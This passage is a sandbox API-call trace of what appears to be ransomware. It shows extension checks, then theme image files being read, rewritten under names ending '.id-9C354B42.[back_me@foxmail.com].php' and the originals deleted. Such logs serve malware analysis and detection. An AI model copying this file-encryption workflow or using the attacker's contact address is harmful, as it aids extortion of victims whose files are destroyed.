(lpString1=".doc", lpString2=".PNG") returned -1 [0046.699] lstrlenW (lpString=".docx") returned 5 [0046.699] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.699] lstrlenW (lpString=".pdf") returned 4 [0046.699] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.699] lstrlenW (lpString=".xls") returned 4 [0046.699] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.699] lstrlenW (lpString=".xlsx") returned 5 [0046.699] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.699] lstrlenW (lpString=".ppt") returned 4 [0046.699] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0046.699] lstrlenW (lpString=".zip") returned 4 [0046.700] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.700] lstrlenW (lpString=".rar") returned 4 [0046.700] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.700] lstrlenW (lpString=".bz2") returned 4 [0046.700] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.700] lstrlenW (lpString=".7z") returned 3 [0046.700] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0046.700] lstrlenW (lpString=".dbf") returned 4 [0046.700] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0046.700] lstrlenW (lpString=".1cd") returned 4 [0046.700] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0046.700] lstrlenW (lpString=".jpg") returned 4 [0046.700] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0046.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0046.700] lstrlenW (lpString=".doc") returned 4 [0046.700] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.700] lstrlenW (lpString=".docx") returned 5 [0046.700] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.700] lstrlenW (lpString=".pdf") returned 4 [0046.700] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.700] lstrlenW (lpString=".xls") returned 4 [0046.700] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.700] lstrlenW (lpString=".xlsx") returned 5 [0046.700] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.700] lstrlenW (lpString=".ppt") returned 4 [0046.700] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0046.700] lstrlenW (lpString=".zip") returned 4 [0046.700] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.701] lstrlenW (lpString=".rar") returned 4 [0046.701] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.701] lstrlenW (lpString=".bz2") returned 4 [0046.701] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.701] lstrlenW (lpString=".7z") returned 3 [0046.701] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0046.701] lstrlenW (lpString=".dbf") returned 4 [0046.701] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0046.701] lstrlenW (lpString=".1cd") returned 4 [0046.701] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0046.701] lstrlenW (lpString=".jpg") returned 4 [0046.701] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.701] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0046.701] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.701] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.924] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=20371) returned 1 [0046.938] CloseHandle (hObject=0x198) returned 1 [0046.949] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png")) returned 0x20 [0046.949] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.950] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.950] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.950] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.950] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0046.950] GetLastError () returned 0x0 [0046.950] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x4f93, lpOverlapped=0x0) returned 1 [0046.952] WriteFile (in: hFile=0x1b0, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x4fa0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x4fa0, lpOverlapped=0x0) returned 1 [0046.953] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.953] WriteFile (in: hFile=0x1b0, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.953] SetEndOfFile (hFile=0x1b0) returned 1 [0046.953] CloseHandle (hObject=0x1b0) returned 1 [0046.954] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.954] SetEndOfFile (hFile=0x198) returned 1 [0046.955] CloseHandle (hObject=0x198) returned 1 [0046.955] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.955] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png")) returned 1 [0046.955] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0046.955] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0046.955] lstrlenW (lpString=".doc") returned 4 [0046.955] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.955] lstrlenW (lpString=".docx") returned 5 [0046.955] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.955] lstrlenW (lpString=".pdf") returned 4 [0046.955] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.955] lstrlenW (lpString=".xls") returned 4 [0046.955] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.955] lstrlenW (lpString=".xlsx") returned 5 [0046.955] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.955] lstrlenW (lpString=".ppt") returned 4 [0046.955] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.955] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0046.955] lstrlenW (lpString=".zip") returned 4 [0046.956] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.956] lstrlenW (lpString=".rar") returned 4 [0046.956] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.956] lstrlenW (lpString=".bz2") returned 4 [0046.956] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.956] lstrlenW (lpString=".7z") returned 3 [0046.956] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.956] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0046.956] lstrlenW (lpString=".dbf") returned 4 [0046.956] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.956] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0046.956] lstrlenW (lpString=".1cd") returned 4 [0046.956] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.956] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0046.956] lstrlenW (lpString=".jpg") returned 4 [0046.956] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.956] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0046.956] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0046.956] lstrlenW (lpString=".doc") returned 4 [0046.956] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.956] lstrlenW (lpString=".docx") returned 5 [0046.956] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.956] lstrlenW (lpString=".pdf") returned 4 [0046.956] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.956] lstrlenW (lpString=".xls") returned 4 [0046.956] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.956] lstrlenW (lpString=".xlsx") returned 5 [0046.956] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.956] lstrlenW (lpString=".ppt") returned 4 [0046.956] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.956] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0046.956] lstrlenW (lpString=".zip") returned 4 [0046.957] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.957] lstrlenW (lpString=".rar") returned 4 [0046.957] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.957] lstrlenW (lpString=".bz2") returned 4 [0046.957] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.957] lstrlenW (lpString=".7z") returned 3 [0046.957] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0046.957] lstrlenW (lpString=".dbf") returned 4 [0046.957] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0046.957] lstrlenW (lpString=".1cd") returned 4 [0046.957] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0046.957] lstrlenW (lpString=".jpg") returned 4 [0046.957] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.957] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0046.957] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.957] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.958] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=26402) returned 1 [0046.958] CloseHandle (hObject=0x198) returned 1 [0046.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png")) returned 0x20 [0046.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.958] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.958] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.958] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.958] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0046.959] GetLastError () returned 0x0 [0046.959] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x6722, lpOverlapped=0x0) returned 1 [0046.961] WriteFile (in: hFile=0x1b0, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x6730, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x6730, lpOverlapped=0x0) returned 1 [0046.962] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.962] WriteFile (in: hFile=0x1b0, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.963] SetEndOfFile (hFile=0x1b0) returned 1 [0046.963] CloseHandle (hObject=0x1b0) returned 1 [0046.963] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.963] SetEndOfFile (hFile=0x198) returned 1 [0046.964] CloseHandle (hObject=0x198) returned 1 [0046.964] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.964] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png")) returned 1 [0046.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.964] lstrlenW (lpString=".doc") returned 4 [0046.964] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.964] lstrlenW (lpString=".docx") returned 5 [0046.964] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.964] lstrlenW (lpString=".pdf") returned 4 [0046.965] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.965] lstrlenW (lpString=".xls") returned 4 [0046.965] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.965] lstrlenW (lpString=".xlsx") returned 5 [0046.965] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.965] lstrlenW (lpString=".ppt") returned 4 [0046.965] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.965] lstrlenW (lpString=".zip") returned 4 [0046.965] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.965] lstrlenW (lpString=".rar") returned 4 [0046.965] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.965] lstrlenW (lpString=".bz2") returned 4 [0046.965] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.965] lstrlenW (lpString=".7z") returned 3 [0046.965] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.965] lstrlenW (lpString=".dbf") returned 4 [0046.965] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.965] lstrlenW (lpString=".1cd") returned 4 [0046.965] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.965] lstrlenW (lpString=".jpg") returned 4 [0046.965] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.965] lstrlenW (lpString=".doc") returned 4 [0046.965] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.965] lstrlenW (lpString=".docx") returned 5 [0046.965] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.965] lstrlenW (lpString=".pdf") returned 4 [0046.966] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.966] lstrlenW (lpString=".xls") returned 4 [0046.966] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.966] lstrlenW (lpString=".xlsx") returned 5 [0046.966] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.966] lstrlenW (lpString=".ppt") returned 4 [0046.966] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.966] lstrlenW (lpString=".zip") returned 4 [0046.966] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.966] lstrlenW (lpString=".rar") returned 4 [0046.966] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.966] lstrlenW (lpString=".bz2") returned 4 [0046.966] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.966] lstrlenW (lpString=".7z") returned 3 [0046.966] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.966] lstrlenW (lpString=".dbf") returned 4 [0046.966] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.966] lstrlenW (lpString=".1cd") returned 4 [0046.966] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0046.966] lstrlenW (lpString=".jpg") returned 4 [0046.966] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.966] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0046.966] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.967] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.967] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1354) returned 1 [0046.967] CloseHandle (hObject=0x198) returned 1 [0046.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif")) returned 0x20 [0046.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.967] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.967] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.967] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.967] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0046.969] GetLastError () returned 0x0 [0046.970] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x54a, lpOverlapped=0x0) returned 1 [0046.971] WriteFile (in: hFile=0x1b0, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x550, lpOverlapped=0x0) returned 1 [0046.972] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.972] WriteFile (in: hFile=0x1b0, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.972] SetEndOfFile (hFile=0x1b0) returned 1 [0046.973] CloseHandle (hObject=0x1b0) returned 1 [0046.973] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.973] SetEndOfFile (hFile=0x198) returned 1 [0046.974] CloseHandle (hObject=0x198) returned 1 [0046.974] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.974] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif")) returned 1 [0046.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.974] lstrlenW (lpString=".doc") returned 4 [0046.974] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.974] lstrlenW (lpString=".docx") 